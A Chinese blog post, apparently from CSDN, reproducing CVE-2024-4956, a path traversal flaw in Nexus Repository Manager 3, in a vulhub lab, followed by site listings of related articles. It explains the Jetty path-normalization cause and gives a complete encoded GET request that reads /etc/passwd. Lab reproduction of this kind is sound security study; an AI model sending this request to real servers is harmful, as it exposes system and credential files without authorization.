vulhub中Nexus Repository Manager 3 未授权目录穿越漏洞(CVE-2024-4956)

最新推荐文章于 2024-07-20 19:02:24 发布
最新推荐文章于 2024-07-20 19:02:24 发布
阅读量403 收藏 6
点赞数 1
分类专栏: vulhub漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yougexiaojiuguan/article/details/139386032
版权

Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。

其3.68.0及之前版本中,存在一处目录穿越漏洞。攻击者可以利用该漏洞读取服务器上任意文件。

环境启动后,访问`http://your-ip:8081`即可看到Nexus的默认页面。

漏洞复现

与Orange Tsai在[Blackhat US 2018](https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf)分享的SpringMVC CVE-2018-1271漏洞类似,Jetty的URIUtil.canonicalPath()函数也将空字符串认为是一个合法目录,导致了该漏洞的产生:

发送如下请求来复现漏洞:
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0

可见,/etc/passwd已被成功读取:

余生有个小酒馆
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
nexus-3.37.0-01-win64 - Nexus Repository Manager OSS
12-12
Nexus Repository Manager OSS 由于nexus目前官网上(https://help.sonatype.com/repomanager3/download)已经很难下载了,除非翻墙,故整理了一下目前最新版本的分享一下,有需要的欢迎下载。
Nexus 3越权漏洞(CVE-2020-11444)
m0_65150886的博客
02-18 667
Nexus Repository Manager 3.x OSS / Pro <= 3.21.1Nexus 3的版本,存在任意修改admin密码越权漏洞,攻击者可以用低权限用户登录获取sessionID越权进行修改admin用户的密码。Nexus Repository是一个开源的仓库管理系统,可搭建npm、maven等私服。3.F12,打开开发者模式,在应用程序查找NXSESSIONID。1.访问http://ip:port,出现如下页面,开始实验。2.点击登录,输入默认账号密码进行登录。
Nexus远程命令执行漏洞复现(CVE-2019-7238)
qq_62056583的博客
07-10 484
漏洞是由于代码基于OrientDB自定义函数的任意JEXL表达式执行功能,所以我们可以通过构造一个.jar包将请求拦截到burpsuite并构造payload来实现一个代码注入,当然我们可攻击的方面不止于此还可以将靶机反弹shell等恶意的攻击行为。
Nexus Repository Manager3( CVE-2020-10199) 远程命令执行漏洞排查
dayouzi的博客
08-14 1139
nexus的全称是Nexus Repository Manager,是Sonatype公司的一个产品。它是一个强大的仓库管理器,极大地简化了内部仓库的维护和外部仓库的访问。主要用它来搭建公司内部的maven私服。但是它的功能不仅仅是创建maven私有仓库这么简单,还可以作为nuget、docker、npm、bower、pypi、rubygems、git lfs、yum、go、apt等的私有仓库,功能非常强大。
Sonatype Nexus Repository 3 路径遍历漏洞复现(CVE-2024-4956)
0xSec
05-23 1056
2024年5月,Nexus Repository官方Sonatype发布了新补丁,修复了一处路径穿越漏洞CVE-2024-4956。经分析,该漏洞可以通过特定的路径请求来授权访问系统文件,进而可能导致信息泄露。该漏洞无前置条件且利用简单,建议受影响的客户尽快修复漏洞
Sonatype Nexus Repository 3目录穿越-文件下载漏洞-CVE-2024-4956
渗透安全Sec
05-24 727
Sonatype Nexus Repository 3目录穿越-文件下载漏洞-CVE-2024-4956
Nexus Repository Manager 3.28.1-01
10-26
最新版本的 Nexus Repository Manager 3.28.1-01 Nexus是一个强大的Maven仓库管理器,它极大地简化了本地内部仓库的维护和外部仓库的访问。 如果使用了公共的Maven仓库服务器,可以从Maven央仓库下载所需要的构件...
nexus-repository-composer:Nexus Repository Manager的Composer支持(正在进行!)
03-09
docker run -d -p 8081:8081 --name nexus-repository-composer nexus-repository-composer 有关如何持久存储卷的更多信息,请查看。 现在可以从浏览器访问该应用程序,为 从Nexus Repository Manager版本3.17开始...
CVE-2019-7238:CVE-2019-7238的Poc-Nexus Repository Manager 3远程执行代码
03-02
CVE-2019-7238 Rico腾讯安全云顶实验室和发现的Nexus Repository Manager 3经身份验证的远程代码执行< 详细分析(英文): 详细分析(非英语): 安全公告:
nexus-repository-apt:Nexus Repository 3插件,允许使用apt信息库
02-26
APT现在是Nexus Repository Manager的一部分。 默认情况下,版本3.17.0包含APT插件。 插件源代码现在位于 归档问题:如果使用3.17.0或更高版本,请在提交所有问题。 升级到3.17.0:如果您是升级到3.17的现有...
【网络安全科普】勒索病毒 防护指南
a38417的博客
07-20 575
常规的杀毒软件查找病毒的原理一般是对当前计算机上的文件进行特征的检测,检测完成后和现有的病毒库的特征数据进行匹配,如果可以匹配成功则找到病毒文件,因此现有的勒索病毒对我们常用的常规杀毒软件是一个很大的挑战。一旦勒索病毒感染了计算机,它会立即开始加密用户的文件,包括文档、图片、视频等,并在屏幕上显示要求用户支付赎金的消息。从操作系统来看被植入病毒的主要是Windows XP、Windows 7,原因是目前这些系统有一部分微软官方已经不再支持更新、以及补丁的维护,一般会存在较多的无法及时修复的漏洞
Web安全验证的重定向和转发.
网络安全领域___专研者.
07-19 582
验证的重定向和转发漏洞是一种常见的Web安全漏洞,它允许攻击者将用户重定向到一个恶意的URL,而不是预期的安全URL。这种漏洞通常发生在应用程序处理重定向和转发请求时,能对目标URL进行适当的验证和过滤。
游戏外挂的技术实现与五年脚本开发经验分享
m0_62996549的博客
07-19 531
引言: 在数字娱乐的浪潮,电子游戏成为许多人生活不可或缺的一部分。然而,随着游戏的普及,一些玩家为了追求更高效的游戏体验或不正当竞争优势,开始使用游戏外挂程序。这些外挂往往通过修改游戏正常运行机制来提供非法优势给使用者。作为拥有五年脚本开发经验的技术人员,我深知探索这一领域需要严谨的态度和对技术的尊重。本文将探讨游戏外挂的技术实现方法,并分享我在脚本开发领域的经验。
网络安全名词解释&操作系统
最新发布
m0_73245690的博客
07-20 462
系统用户包括本地用户、网络用户和系统管理员,用于执行系统操作和管理任务。用户组用于将多个用户组织在一起,以便统一管理权限和资源访问。服务用户是专门为运行服务或应用程序创建的账户,需要根据服务的要求配置相应的权限。Windows Defender 防火墙(Windows 系统)(Linux 系统)pf(FreeBSD / macOS 系统)这些防火墙通常提供基本的网络保护功能,并允许用户配置详细的规则来控制流量。出站规则和入站规则分别控制从计算机发出的流量和进入计算机的流量。
网络安全-网络安全及其防护措施6
LS_Ai的博客
07-16 928
访问控制列表(ACL)是一种网络安全机制,用于控制网络设备上的数据包流量。通过ACL,可以定义允许或拒绝的流量,增强网络的安全性和管理效率。ACL通过在路由器或交换机上设置规则,确定哪些流量可以通过,哪些流量应该被阻止。入侵检测系统(IDS)定义:监控网络流量和系统活动,检测和记录潜在的安全威胁和攻击行为。IDS提供告警信息,但不主动阻止攻击。作用:检测并报警,但不干预攻击,主要用于识别潜在的安全问题和攻击模式。入侵防御系统(IPS)定义:在IDS的基础上,进一步采取措施阻止攻击行为,保护网络安全
网络安全-网络安全及其防护措施5
LS_Ai的博客
07-16 998
互联网交换点(IXP)是一个物理基础设施,通过它,互联网服务提供商(ISP)和内容提供商可以互相交换互联网流量。IXP的目的是提高网络性能、降低带宽成本和减少流量延迟。网络虚拟化是通过软件定义的方式,将物理网络资源抽象为虚拟资源,以提高网络的灵活性、可管理性和资源利用率。网络虚拟化可以实现网络功能的自动化部署和管理,适应动态变化的业务需求。网络带宽管理是通过监控和控制网络带宽的使用,优化网络性能并确保关键应用的带宽需求。带宽管理有助于防止网络拥塞,提高网络效率,保障服务质量(QoS)。
算机科学与技术 基于Java的医务室病例管理小程序的设计与实现.docx
07-20
算机科学与技术 基于Java的医务室病例管理小程序的设计与实现
物联网工程_基于NBIOT的白洋淀水质实时监测系统.docx
07-20
物联网工程_基于NBIOT的白洋淀水质实时监测系统
nexus repository manager
03-16
Nexus Repository Manager是一款开源的仓库管理器,主要用于管理和分发软件包、组件和其他二进制文件。它支持多种仓库类型,包括Maven、npm、Docker、RubyGems等,可以帮助开发者更好地管理和共享代码库。Nexus Repository Manager还提供了丰富的安全和权限控制功能,可以确保仓库的文件得到保护和授权访问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值